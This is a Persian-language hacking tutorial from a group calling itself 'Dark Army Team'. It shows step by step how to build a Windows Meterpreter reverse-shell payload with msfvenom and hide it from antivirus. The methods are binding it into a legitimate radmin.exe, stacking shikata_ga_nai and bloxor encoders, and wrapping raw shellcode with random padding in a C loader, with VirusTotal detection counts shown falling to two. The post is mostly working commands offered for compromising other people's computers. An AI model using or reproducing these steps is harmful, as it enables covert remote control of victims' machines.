سلام دوستان عزیز و کاربران خوب وب ارتش تاریکی :)


کسایی که دنبال هک و نفوذن قطعا اسم متااسپلویت رو شنیدن...

توی این پست قراره یه اکسپلویت مترپرتر برای ویندوز بنویسیم و سعی کنیم از روش های مختلف آنتی ویروس هارو دور بزنیم.

قطعا اگه کسی رو بخوایم اکسپلویت کنیم و طرف یه آنتی ویروس خیلی ساده داشته باشه، راحت میتونه بفهمه که فایلی که بهش دادیم ویروسیه...


توضیحات کافیه، بریم برای کار :)

اول باید کالی رو آتیش کنید...

اگه ندارید باید دوتا ابزار رو توی ویندوزتون نصب کنید (همینطور مکینتاشی ها...)


۱- متااسپلویت

۲- کمپایلر C


حالا برای تست آنتی ویروس ها نیاز به سایت ویروس توتال داریم.

سایت با ۱۰۰ تا آنتی ویروس مختلف فایلی که آپلود کردید رو تست میکنه :)


حالا با متااسپلویت یه اکسپلویت مترپرتر میسازیم:

msfvenom -p windows/meterpreter/reverse_tcp LPORT=8080 LHOST=IP -f exe >DarkArmyTeam.exe
بجای آیپی، آیپی خودتون رو بنویسید...
حالا فایلو توی سایت تست کنید. میبینید تقریبا همه آنتی ویروسا، اکسپلویت رو تشخیص دادن. (۵۶ آنتی ویروس از ۶۹تا تشخیص دادن)




حالا از تکنیک قایم کردن اکسپلویت توی یه فایل سالم استفاده میکنیم که یکم تعداد تشخیص هارو کمتر کنیم...

توی کالی یک فولدر وجود داره که چند فایل ویندوزی(exe) هست که از اونا استفاده میکنیم. میتونید از هر چیزی استفاده کنید...
کد زیر رو توی ترمینال بزنید  و یک اکسپلویت قایم شده توی یک فایل درست کنید.

msfvenom -p windows/meterpreter/reverse_tcp LPORT=8080 LHOST=IP -x /usr/share/windows-binaries/radmin.exe -k -f exe >radmin.exe

حالا دوباره توی ویروس توتال اکسپلویتتونو تست کنید.
درسته فقط یکی کم شد و ۵۵آنتی ویروس تشخیصش دادن ولی همون یکی خیلی خوبه و توی مراحل بعدمون تاثیر داره...


حالا میریم سراغ روش بعدی و از اینکدر های خود متااسپلویت استفاده میکنیم.

کد زیر رو بزنید و یک اکسپلویت کد گذاری شده متااسپلویت درست کنید:

msfvenom -p windows/meterpreter/reverse_tcp LPORT=8080 LHOST=IP -e x86/shikata_ga_nai -i 10 -f raw >meterpreterencoder.bin

تو اینجا یک فایل با فرمت bin و با استفاده از اینکدر x86/shikata_ga_nai درست کردیم. حالا باید اینو با یک اینکدر دیگه و با فرمت exe تبدیل کنیم:

msfvenom -f exe -a x86 --platform windows -e x86/bloxor -i 2 >meterpreterencoder.exe<meterpreterencoder.bin

خب حالا فایل ایجاد شده رو (meterpreterencoder.exe) توی ویروس توتال تست کنید.
ببینید چه تغییری کرده. فقط ۴۹ آنتی ویروس تشخیص دادن.

حالا کد های بالا رو ترکیب میکنیم.
کد زیر رو بزنید و یک اکسپلویت جدید درست کنید:

msfvenom -p windows/meterpreter/reverse_tcp LPORT=8080 LHOST=IP -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe >radminencoded.exe

این رو هم توی توتال ویروس تست کنید.
میبینید که ۳۴ آنتی ویروس از ۷۰ آنتی ویروس تشخیص دادن.

حالا میریم سراغ روش بعدی و باید دست به کد بشیم :)

کد های زیر رو توی یک فایل ذخیره میکنیم و اسمشو میذاریم custommeterpreter.c

#include <stdio.h>

unsigned char random[]=

unsigned char Shellcode[]=

int main(void)
{
    ((void(*)())Shellcode)();
}

توی این کد قراره یکسری کاراکتر رندوم بین کد ها اضافه کنیم که درصد تشخیص بیاریم پایین.

حالا کد زیر رو توی ترمینال بزنید تا بایت های هگزادسیمال اکسپلویت رو از متااسپلویت بگیریم و فایل خروجی نگیریم:
msfvenom -p windows/meterpreter/reverse_tcp LPORT=8080 LHOST=IP -f c -e x86/shikata_ga_nai -i 5

الان باید خروجی شبیه زیر داشته باشیم:

کل کد های هگزادسیمال رو کپی کنید.
حالا این کد هارو جلوی کد زیر پیست کنید:
unsigned char Shellcode[]=

و بعد توی ترمینال کد زیر رو بزنید و خروجی رو کپی کنید:
cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512

حالا برید به فایل و کاراکتر هایی که کپی کردید رو توی یک کوتیشن جلوی کد زیر پیست کنید:
unsigned char random[]=
حالا باید کدی شبیه کد زیر داشته باشید
(یادتون باشه که کد ها متفاوته و کد زیر برای شما کار نمیکنه)


(قسمت main توی کد معلوم نیست ولی اون رو هم یادتون باشه داشته باشید)

حالا با دستور زیر کدتون رو کمپایل کنید:
gcc customemeterpreter.c -o customemeterpreter.exe
این رو هم توی ویروس توتال تست کنید و نتیجه رو ببینید.
فقط دوتا آنتی ویروس تشخیصش دادن!


اینم از این!
امیدوارم تو هکاتون موفق باشید :))

we work in dark to serve light
we are dark army team